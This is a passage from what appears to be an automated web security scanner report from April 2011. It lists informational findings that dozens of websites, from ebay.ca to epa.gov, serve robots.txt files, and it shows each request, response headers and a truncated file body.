Expires: Sat, 16 Apr 2011 14:18:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.266. http://www.ebaumsworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:32 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 21 Mar 2011 03:23:02 GMT
Accept-Ranges: bytes
Content-Length: 62
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adcodes/
Disallow: /pictures/enlarge/
24.267. http://www.ebay.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebay.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebay.ca

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 659
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 14:10:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:10:05 GMT
Connection: close

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...
24.268. http://www.ebayclassifieds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayclassifieds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebayclassifieds.com

Response

HTTP/1.0 200 OK
Connection: keep-alive
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private=Set-Cookie
Set-Cookie: p=""; Domain=ebayclassifieds.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 94
Date: Sat, 02 Apr 2011 13:39:12 GMT

User-agent: *
Disallow: /m/
Disallow: /f/
Sitemap: http://www.ebayclassifieds.com/sitemap.xml
24.269. http://www.economist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.economist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.economist.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:58:34 GMT
ETag: "78610-534-49f50aa86be80"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:21:29 GMT
X-ws: 4
Content-Type: text/plain; charset=UTF-8
Content-Length: 1332
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381544 1449342434
Age: 365598
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT
Vary: Accept-Encoding

# robots.txt
#

# Sitemap

Sitemap: http://www.economist.com/googlenews.xml

# No robots are allowed to index private paths:

User-agent: *
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow
...[SNIP]...
24.270. http://www.edmunds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edmunds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edmunds.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="http://www.edmunds.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Sat, 02 Apr 2011 13:24:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:30 GMT
Content-Length: 1311
Connection: close


User-agent: *
Disallow: /apps/log/PartnerLogServlet
Disallow: /products/gmbp/GMlinkConfigurator
Disallow: /apps/redirector/RedirectController
Disallow: /apps/dcm/

...[SNIP]...
24.271. http://www.education.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/plain
Content-Length: 104
Last-Modified: Mon, 28 Feb 2011 18:40:24 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

Sitemap: http://www.education.com/sitemapindex.xml

User-agent: *
Disallow: /admin/
Disallow: /results/
24.272. http://www.egotastic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.egotastic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 631
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /default-page/
Disallow: /includes/ad/
Disallow: /includes/counter/
Disallow: /includes/email/
Disallow: /includes/message/
Disallow: /inclu
...[SNIP]...
24.273. http://www.eharmony.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eharmony.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 28 Apr 2009 01:33:15 GMT
ETag: "1157-46893725cacc0"
Accept-Ranges: bytes
Content-Length: 4439
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:53:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=67c62384-b369-4692-650d-a479b0a1b13a;expires=Thu, 29-Sep-2011 13:38:39 GMT;path=/;domain=.eharmony.com;

sitemap: /sitemap.gz

User-agent: *
Disallow: /singles/

User-agent: *
Disallow: /static/

User-agent: *
Disallow: /assets/

User-agent: *
Disallow: /src/

User-agent: *
Disallow: /sbm
...[SNIP]...
24.274. http://www.ehealthforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehealthforum.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:04 GMT
Server: Apache
Last-Modified: Thu, 04 Mar 2010 09:23:44 GMT
ETag: "fe98a8-190-480f627bf4800"
Accept-Ranges: bytes
Content-Length: 400
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

User-agent: *
Disallow: /health/terms.html
Disallow: /health/jump.php
Disallow: /health/jump_confirm.php
Disallow: /health/pregnancy_calander.html
Disallow: /health/medical_symptoms.html
Disallow: /he
...[SNIP]...
24.275. http://www.ehow.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 225
Content-Type: text/plain
Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:20 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=86348
Date: Sat, 02 Apr 2011 14:00:20 GMT
Connection: close

User-agent: *
Disallow: /IDidThisSolutionEdit
Disallow: /CultureSwitch
Disallow: /PrintArticle
Disallow: /print/
Disallow: /Searchfeed
Disallow: /MailingList
Disallow: /forums.aspx
Sitemap: http://www
...[SNIP]...
24.276. http://www.elle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5
Last-Modified: Tue, 15 Mar 2011 04:37:08 GMT
ETag: "280df-e1-49e7dfb1e2500"
Accept-Ranges: bytes
Content-Length: 225
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 14:06:45 GMT
Connection: close

User-agent: *
Disallow:/Designers/
Disallow:/Shopping/Elle-Shops/Product/(id)/

Sitemap: http://www.elle.com/sitemap/sitemap_index.xml

User-agent: Googlebot
Noindex: /Shopping/Elle-Shops/Product/(
...[SNIP]...
24.277. http://www.elyrics.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elyrics.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Tue, 21 Sep 2010 17:00:11 GMT
ETag: "1848a74-2f4-490c7f63e1cc0"
Accept-Ranges: bytes
Content-Length: 756
Connection: close
Content-Type: text/plain

#########################################
#########################################
### The following command will disable just the directory "private" and all its contents:
### Disallow: /private/
##
...[SNIP]...
24.278. http://www.emedtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emedtv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595715130; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
Last-Modified: Thu, 31 Mar 2011 23:53:27 GMT
Cache-Control: max-age=300
Content-Length: 952
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /pub_js/
Disallow: /lps/
Disallow: /lpssrc/
Disallow: /m/
Disallow: /skyframeopenads.html
Disallow: /skyframe.html
Disallow: /boxframeopenads.html
Disallow: /boxframebottomopen
...[SNIP]...
24.279. http://www.encyclopedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encyclopedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.encyclopedia.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=432000
Content-Type: text/plain
Last-Modified: Tue, 15 Mar 2011 15:48:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:39:39 GMT
Connection: close
Content-Length: 1169

# Encyclopedia: robots.txt
#
# this file is used to allow crawlers to crawl our site.
#
user-agent: *
Disallow: /printtopic.aspx
Disallow: /printdocument.aspx
Disallow: /documentlogging.asp
...[SNIP]...
24.280. http://www.engadget.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.engadget.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 122
Keep-Alive: timeout=5, max=999992
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /search
Disallow: /_uac/adpage.html
24.281. http://www.enotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enotes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 17:11:21 GMT
ETag: "73311-11e-49fca61de2040"
Accept-Ranges: bytes
Content-Length: 286
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow: /images/
Disallow: /404.php
Disallow: /favicon.ICO
Disallow: /*buyPass
Disallow: /*citePage
Disallow: /*getpass
Disallow: /*print
Disallow: /*login
Disallow: /*titleCite
Disall
...[SNIP]...
24.282. http://www.enterprise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enterprise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enterprise.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:36 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 15:23:00 GMT
ETag: "22cbe-384-482a19f409d00"
Accept-Ranges: bytes
Content-Length: 900
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
X-Pad: avoid browser bug

User-agent: *
Disallow: /arms_auto/
Disallow: /armsweb/
Disallow: /casestudy/
Disallow: /ukcorp/
Disallow: /aaa/
Disallow: /afs/
Disallow: /AAA/
Disallow: /AFS/
Disallow: /content/include/
Disallow: /
...[SNIP]...
24.283. http://www.eonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eonline.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.4
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 732
X-N: S
Date: Sat, 02 Apr 2011 13:43:47 GMT
Connection: close
Set-Cookie: edition=us; expires=Sun, 03-Apr-2011 13:43:47 GMT; path=/; domain=.eonline.com
Set-Cookie: adEdition=us; expires=Sun, 03-Apr-2011 13:43:47 GMT; path=/; domain=.eonline.com

# robots.txt for all EOL sites
#
# Note to people who might be reading this: You won't find anything
# interesting or confidential beneath the following paths. These are
# simply areas that don't make
...[SNIP]...
24.284. http://www.epa.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epa.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:53 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 10:52:22 GMT
ETag: "d3c4030d-2d312-49fed52334580"
Accept-Ranges: bytes
Content-Length: 185106
Connection: close
Content-Type: text/plain

# robots.txt file for http://www.epa.gov
User-agent: *
Disallow: /search97/
Disallow: /reports/
Disallow: /scram001/7thconf/calpuff/apr02a.met
Disallow: /scram001/7thconf/calpuff/apr02b.met
Disallow:
...[SNIP]...
24.285. http://www.epicurious.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epicurious.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epicurious.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9e6961b58cdc866a011f4cda7f672580:1254767395"
Last-Modified: Mon, 05 Oct 2009 18:29:55 GMT
Accept-Ranges: bytes
Content-Length: 298
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:00:01 GMT
Connection: close
X-N: S

User-agent: *
Sitemap: http://www.epicurious.com/sitemap.xml
Disallow: /tools/searchresults*?*pageNumber=*
Disallow: /tools/searchresults*?*threshold=*
Disallow: /tools/browseresults*?*threshold=*
Dis
...[SNIP]...
24.286. http://www.epinions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epinions.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:52 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Set-Cookie: EPV_PgVwID=59173f1f09973f7e7d07d8b8; path=/; domain=.epinions.com;
Cache-control: private
Content-Length: 34
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /content/
24.287. http://www.epodunk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epodunk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epodunk.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 14:18:50 GMT
Content-Type: text/plain
Connection: close
Content-Length: 935
Last-Modified: Tue, 16 Dec 2008 20:18:14 GMT
Accept-Ranges: bytes
ETag: "087766cbb5fc91:eb1"
X-Powered-By: ASP.NET

# robots.txt, www.epodunk.com 12/28/2005
#
User-Agent: Ocelli
Disallow: /
User-agent: URL_Spider_Pro
Disallow: /
User-agent: CherryPicker
Disallow: /
User-agent: EmailCollector
Disallow: /

...[SNIP]...
24.288. http://www.eppicard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eppicard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eppicard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:55 GMT
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 05 Sep 2008 19:54:36 GMT
ETag: "36684-78-4562b70639700"
Accept-Ranges: bytes
Content-Length: 120
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 14:38:55 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# Allow Googlebot anywhere
User-agent: Googlebot
Disallow:
# Allow no other bots on the site
User-agent: *
Disallow: /
24.289. http://www.essortment.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.essortment.com

Response

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
ETag: "6df0d8e51dc38df49074b72c0ef58d84c8904776"
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Length: 72
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.essortment.com/sitemap.xml
24.290. http://www.etsy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etsy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etsy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 28 Mar 2011 19:06:14 GMT
Accept-Ranges: bytes
Content-Length: 1120
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 13:31:05 GMT
Connection: close

User-agent: Spinn3r
Disallow: /
User-agent: *
Disallow: /assets/
Disallow: /css/
Disallow: /flash/
Disallow: /functions/
Disallow: /js/
Disallow: /maintenance/
Disallow: /planb/
Disallow: /static/
Dis
...[SNIP]...
24.291. http://www.everydayhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 7814
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 19:07:46 GMT
Accept-Ranges: bytes
ETag: "02d0988de9cb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

User-agent: AdsBot-Google
Allow: /
Disallow:

User-agent: Mediapartners-Google
Allow: /
Disallow:

User-agent: adidxbot
Allow: /
Disallow:

User-agent: MSNPTC
Allow: /
Disallow:

User-
...[SNIP]...
24.292. http://www.evtv1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 2187
Content-Type: text/plain
Last-Modified: Wed, 10 Sep 2008 04:00:43 GMT
Accept-Ranges: bytes
ETag: "c870e4cbf912c91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

User-agent: *
Disallow: /Admin/
Disallow: /Connections/
Disallow: /ABC/
Disallow: /Advertiser/
Disallow: /advertisers/
Disallow: /Andy/
Disallow: /AndyVidsense/
Disallow: /anisha/
Disallow: /
...[SNIP]...
24.293. http://www.ew.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Thu, 10 Jul 2008 14:00:07 GMT
ETag: "1a8-d7b407c0"
Accept-Ranges: bytes
Content-Length: 424
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.294. http://www.examiner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.examiner.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:43:56 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 01 Apr 2011 19:34:21 GMT
ETag: "17006e2-666-49fe07f1de940"
Accept-Ranges: bytes
Content-Length: 1638
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 12:43:56 GMT
X-WebNode: web4.b.examiner.com

# $Id: robots.txt,v 1.15 2010/12/29 04:05:07 webchick Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...
24.295. http://www.expedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html
ntCoent-Length: 554
Cache-Control: private, max-age=313394
Date: Sat, 02 Apr 2011 13:23:12 GMT
Content-Length: 554
Connection: close

User-agent: *
Allow: /
Disallow: /daily/common/
Disallow: /cd/
Disallow: /pub/agent.dll?qscr=mrdt
Disallow: /pub/agent.dll?qscr=mrdr
Disallow: /daily/vacations/merch/
Disallow: /daily/ho
...[SNIP]...
24.296. http://www.experienceproject.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experienceproject.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.experienceproject.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:00:00 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 02 Sep 2010 20:34:37 GMT
Accept-Ranges: bytes
Content-Length: 1277
Vary: Accept-Encoding

User-agent: *
Disallow: /ajax/
Disallow: /register.php?
Disallow: /dologin.php?
Disallow: /search_rss.php?
Disallow: /invitation.php?
Disallow: /widgets_js/
Disallow: /FCKeditor/
Disallow: /me
...[SNIP]...
24.297. http://www.ez-tracks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain

User-agent: *
Disallow: /songcategories.html
Disallow: /nlogClicks.cfm
Disallow: /noads.html
Disallow: /index-VideoCategory-Adult.html
Disallow: /index-Video-Anna_Nicole_Smith_Exposed.html
Disal
...[SNIP]...
24.298. http://www.ezanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezanga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 03 Jan 2010 01:09:56 GMT
ETag: "1401cb-32a-47c38434d6100"
Accept-Ranges: bytes
Content-Length: 810
Connection: close
Content-Type: text/plain; charset=UTF-8

# By reading this file, you are blocked from accessing any regular files.
# Any attempts to violate this will be recorded. If simple curiosity led
# you to read this file, I'm sorry -- by reading this
...[SNIP]...
24.299. http://www.factmonster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.factmonster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753785137375; path=/; expires=Sun, 01-Apr-12 14:16:25 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:16:25 GMT
Content-Length: 533
Content-Type: text/plain;charset=iso-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /dynaweb/
Disallow: /dw/
Disallow: /oasis/
Disallow: /oasisi-e.php
Disallow: /oasisi-i.php
Disallow: /oasisi-j.php
Disallow: /oasis
...[SNIP]...
24.300. http://www.familyeducation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.familyeducation.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:56:22 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 23 Jan 2008 19:33:56 GMT
ETag: "70bfb8e4f65dc81:941"
Content-Length: 1822

# robots.txt for http://www.familyeducation.com/

Sitemap: http://www.familyeducation.com/sitemap.xml

User-agent: *
Disallow: /article/email
Disallow: /article/print
Disallow: /software/
Disa
...[SNIP]...
24.301. http://www.famousfootwear.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famousfootwear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.famousfootwear.com

Response

HTTP/1.0 200 OK
Content-Length: 1154
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 20:34:40 GMT
Accept-Ranges: bytes
ETag: "7cd745893dcb1:99d1"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:16:34 GMT
Connection: close

User-agent: *
Disallow: /24hourfitness/
Disallow: /310monitoring/
Disallow: /aaa/
Disallow: /aaahawaii/
Disallow: /aaaloginrequest/
Disallow: /aaanewmexico/
Disallow: /aaapremier/
Disallow: /a
...[SNIP]...
24.302. http://www.fandango.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fandango.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fandango.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 394
Content-Type: text/plain
